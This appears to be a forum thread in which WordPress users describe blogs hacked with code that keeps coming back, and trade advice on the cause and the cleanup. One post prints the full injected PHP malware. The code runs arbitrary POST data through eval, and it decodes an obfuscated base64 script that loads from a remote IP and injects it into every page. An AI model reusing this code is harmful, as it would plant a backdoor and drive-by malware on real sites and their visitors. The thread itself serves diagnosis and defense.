New Blog Seems to be Hacked

yap, its already been talked about. if you have any .html files, they have bad javascript in them as well.

I cleaned five blogs last weekend, that had this problem. There has been another report of this since then, and now yours. Of those 7, there’s 1 commonality – that at least one theme’s functions.php was altered.

I think that’s important; I don’t know why yet, but I do.

This blog is completely new. I just registered the domain recently and set it up. I even completely redid everything last night. I have about a dozen other established long running WP blogs and all of them seem to be fine.

The funny thing is that I have installed WP on this domain both by ftp’ing the files and creating the database as well as using the fantastico control panel.

I have even tried deleting the hosting account and recreating it with a different password etc

There’s something wrong with your config file at the moment.

Yes it happens to the config file too, forgot to list it above

As with any of the other files affected you can remove the “weird” code from the config and other files but it just regenerates itself witin a few hours

Can you post the code it generates?

Kentucky and Whoo, those are 2.7.1 installs? Shared servers, unsmart file permissions, ancient plugins or themes or could it be a WP thing afterall?

Just google it, thelastknight.

https://www.google.com/search?hl=en&q=tmp_lkojfghx&btnG=Google+Search&aq=f&oq=

its not wordpress specific, one of the sites I cleaned out over the weekend had a phpBB install and a guestbook on it, as well, and they were hacked as well.

Gangleri,

the 5 I saw – all 2.7.1 installs. They might have been upgrades, I dont know, but they were clean and well-done upgrades, if they were at all.

2 hosts, one shared, one dedicated (vps probably).

Maybe it’s best to die() if the function exists and print a maintenance message.

maybe its best to not have to do that at all, but yes your suggestion is a very nice stop-gap. I like that idea so much I might have to set that up on these sites, only Ill have mine send an email instead.

Thanks for the idea. ??

https://twitter.com/drstonyhills/statuses/1407317823

Also, as I have said, this was a completely new install of the latest version with only a few plugins (the same I have been using on some other blogs)

Anyway, here is the code it generates:

<?php if(!function_exists(‘tmp_lkojfghx’)){if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdaNiUzQ3NaNmNyUXVpYlB1cHQlMjBzcmNiUHUlM0QlMkYlMkY5NCUyRTJYNTRYNTdYNSUyRTIlMkVySkUxWjY5UXU1ckpFJTJGalF1cVF1dVV3ZXI2OXlRdSUyRTY5ajY5cyUzRXJKRSUzQyUyRkVsZHNaNmNyaXA2OXQlM0UnKS5yZXBsYWNlKC9Vd3xRdXxiUHV8RWxkfHJKRXw2OXxaNnxYNS9nLCIiKSk7CiAtLT48L3NjcmlwdD4=’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\'”][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(‘#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);if(stristr($s,'<body’))$s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,'</body’)||stristr($s,'</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2’)$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2(); ?>

Looks like a hack to me. This code always gives it away: base64_decode

You could try installing numerous WordPress security upgrades, that would probably help if the issues isn’t on the server.

If you host’s server was hacked, there’s not much you can do other than request to be moved to another server or hope your hosting company fixes the problem. I’d call them and let them know what’s going on.

Also, are you creating a new database with each new install, or using the same one?

I got this with a completely new install.

I installed using fantastico panel. Within a few hours of my set up I started getting the error message and telling me

Parse error: syntax error, unexpected T_VARIABLE in …/public_html/index.php on line 1

I checked the file and found the added code. I removed the code and got the same error only with a different file name. I went down the line editing ut the added code in all the affected files. Within an hour or so the error was back.

I removed everything from the server, all files and the MySQL database. I started over fresh but this time I downloaded the 2.7.1 zip and ftp’d the files to the server, created the dB and installed WP.

An hour or so later it was down with the same error message.

Next I completely removed the hosting account from my hosting and then recreated it and started over with everything from scratch for the 3rd time.

I should also say that in the first 2 times I used an export/import file
for the content, BUT on the third and last attempt I did not use that export but instead used some notepad file backups I have for the content.

My site got hacked two days ago, with the same error code showing up:

Parse error: syntax error, unexpected T_VARIABLE in …/public_html/index.php on line 1

Fortunately, someone at my hosting company cleared it all up for me, disabled all the plugins, and my theme needed to be uploaded again.

He said it looked like the hack happened through a plugin – one that wasn’t updated recently and offered a security hole because no one was keeping an eye on it. So, from now on, I’m only using plugins with recent updates!

Everything’s working fine now. Hope this helps!

I dont think this is being caused by a plugin with my site. The first time it happened I hadnt activated any plugins except akismet and all in one SEO. Both of these plugins were completely up to date.

I have several other blogs running on the same reseller (shared) hosting account – none of my other blogs are experiencing this problem. (Yet!)